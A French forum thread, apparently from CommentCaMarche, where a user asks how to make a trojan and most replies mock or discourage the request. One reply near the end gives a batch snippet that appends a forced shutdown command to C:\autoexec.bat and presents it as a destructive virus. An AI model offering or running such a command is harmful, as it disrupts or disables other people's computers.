|
|
|
|
Configuration: Windows XP Internet Explorer 7.0
Tes intentions ne semblent pas très honnêtes...
Poste ce genre de problème ailleurs. |
Bonsoir H4 ....
Et tu crois qu'on va te répondre, ici sur CCM ? Tu nous prends pour des "C..." Personne ici n'a envie d'aller se rfaire une Santé Passe ton chemin , et pose une question plus intelligente;. Reconnaitre être "con", est un signe d'intelligence !
|
Page, doc et tutoriaux officiels va su ce site tu trouvera petere lé reponse pour cré un trojen |
Créer des trojans ne servent pas qu'au gens mal intentionné , si quelqun a besoin de relier ses deux ordinateur ou quelque chose dans ce genre , je pense que c'est legal . |
lol j'aime bien le lien qui a été donné!
comment créé des page web en PHP!! j'adort! « don’t feed the troll » (ne nourrissez pas le troll) Ne pollué pas le post des autres! créé vous votre propre post, pour toutes questions! merci pour eux et pour nous!! |
écoute, je trouve cela vraiment con au plus au point de faire cela. je te le déconseille fortement carc'est illégal. Et quand tu auras un trojan sur ton ordi, tu ne diras plus la même chose... Alors fait pas ce truc. (les pirate, ce sont les gens qui sont con et qui veulent juste se la peter en disant: je sais pirater! franchement, je trouve cela DéBILE!!!!!) je dit pas que tu ai comme cela mais deviens pas un pirate et surtout ne les encourages pas!) VIVE LES ANTI-PIRATES!
les pirate, c des nazes!!!!!! (quand j'ai écris ces mots, j'était légerement énnervé mais, je n'en pense pas moins!!!!!!!! |
je suis daccor avec Oddfan321 car moi jme suis déja fais piraté une adresse msn et sa fais pas vrément plésir
|
pour créer un virus trojan il fo que tu ouvre un document texte et que tu ecrive:
@echo off echo shutdown -s -f -t 0 >> C: \autoexec.bat cls mais fait attention mec ci t'a pas d'anti virus ne le fait pas car ces un vrai virus destructeur donc il fau que tu et un anti virus |
Résultats pour comment cree des trojan